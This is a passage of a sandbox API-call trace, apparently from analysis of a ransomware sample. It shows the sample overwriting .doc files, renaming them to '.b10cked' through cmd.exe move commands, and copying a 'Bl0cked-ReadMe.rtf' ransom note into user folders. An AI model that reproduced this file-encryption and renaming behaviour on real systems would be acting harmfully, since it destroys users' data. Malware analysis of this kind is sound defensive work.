lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x12c70 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.291] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.291] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9637, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9637, lpOverlapped=0x0) returned 1 [0137.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.292] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9637, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9637, lpOverlapped=0x0) returned 1 [0137.292] SetFilePointer (in: hFile=0x114, lDistanceToMove=-38455, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9639 [0137.292] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9637, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9637, lpOverlapped=0x0) returned 1 [0137.293] SetFilePointer (in: hFile=0x114, lDistanceToMove=-38455, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9639 [0137.293] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9637, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9637, lpOverlapped=0x0) returned 1 [0137.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UzyEGr8akjufgS.doc", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0137.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UzyEGr8akjufgS.doc", cchWideChar=18, lpMultiByteStr=0x13288fc, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UzyEGr8akjufgS.doc", lpUsedDefaultChar=0x0) returned 18 [0137.298] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x12c70 [0137.298] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.298] CloseHandle (hObject=0x114) returned 1 [0137.300] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\UzyEGr8akjufgS.doc", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC") returned 0x48 [0137.300] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0137.301] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UZYEGR~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\UzyEGr8akjufgS.doc.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xcf0, dwThreadId=0xcec)) returned 1 [0137.303] CloseHandle (hObject=0x110) returned 1 [0137.303] CloseHandle (hObject=0x114) returned 1 [0137.303] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0137.303] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\", cchLength=0x2d | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\") returned 0x2d [0137.303] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\LP6Y\\HQVIBU00\\U7E2T\\", cchCount2=45) returned 3 [0137.303] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0137.303] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.303] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount1=88, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.303] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.304] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.304] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.304] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\") returned 0x3c [0137.304] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.304] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.304] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xd0c, dwThreadId=0xcf4)) returned 1 [0137.364] CloseHandle (hObject=0x110) returned 1 [0137.364] CloseHandle (hObject=0x114) returned 1 [0137.364] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\nrwdonydb2-uaoum\\1vhpwyxy0ynvr kbaeh\\bl0cked-readme.rtf")) returned 0x20 [0137.364] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.364] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.364] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.364] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.365] ReleaseMutex (hMutex=0xf8) returned 1 [0137.365] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.365] ReleaseMutex (hMutex=0xf8) returned 1 [0137.365] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.365] ReleaseMutex (hMutex=0xf8) returned 1 [0137.365] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.365] ReleaseMutex (hMutex=0xf8) returned 1 [0137.365] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\WnPdVDXwSUv.doc" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\5oweksadhmyqwxms\\wxmd5ucxt4ttzyn6xhkt\\wnpdvdxwsuv.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.365] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19415435001) returned 1 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.365] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x51a3 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.366] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.367] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.367] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.367] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x51a3 [0137.367] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.367] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x4cbb [0137.367] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x51a3 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.368] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x51a3 [0137.369] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.369] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.369] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x28d0, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x28d0, lpOverlapped=0x0) returned 1 [0137.369] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.369] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x28d0, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x28d0, lpOverlapped=0x0) returned 1 [0137.369] SetFilePointer (in: hFile=0x114, lDistanceToMove=-10448, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x28d3 [0137.369] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x28d0, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x28d0, lpOverlapped=0x0) returned 1 [0137.369] SetFilePointer (in: hFile=0x114, lDistanceToMove=-10448, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x28d3 [0137.369] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x28d0, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x28d0, lpOverlapped=0x0) returned 1 [0137.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WnPdVDXwSUv.doc", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0137.374] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WnPdVDXwSUv.doc", cchWideChar=15, lpMultiByteStr=0x131324c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WnPdVDXwSUv.doc", lpUsedDefaultChar=0x0) returned 15 [0137.374] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x51a3 [0137.375] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.375] CloseHandle (hObject=0x114) returned 1 [0137.375] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\WnPdVDXwSUv.doc", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC") returned 0x3f [0137.376] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\") returned 0x33 [0137.377] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WNPDVD~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\WXMD5U~1\\WnPdVDXwSUv.doc.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xd40, dwThreadId=0xd30)) returned 1 [0137.383] CloseHandle (hObject=0x110) returned 1 [0137.383] CloseHandle (hObject=0x114) returned 1 [0137.384] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\WxMD5ucxt4TTzYn6xhkt\\", cchLength=0x48 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\") returned 0x48 [0137.384] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\nRwdONYdB2-UAOUM\\1VhPwYxy0yNVr kbAeh\\", cchLength=0x58 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\") returned 0x58 [0137.384] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\WXMD5UCXT4TTZYN6XHKT\\", cchCount1=72, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\NRWDONYDB2-UAOUM\\1VHPWYXY0YNVR KBAEH\\", cchCount2=88) returned 3 [0137.384] CharUpperBuffW (in: 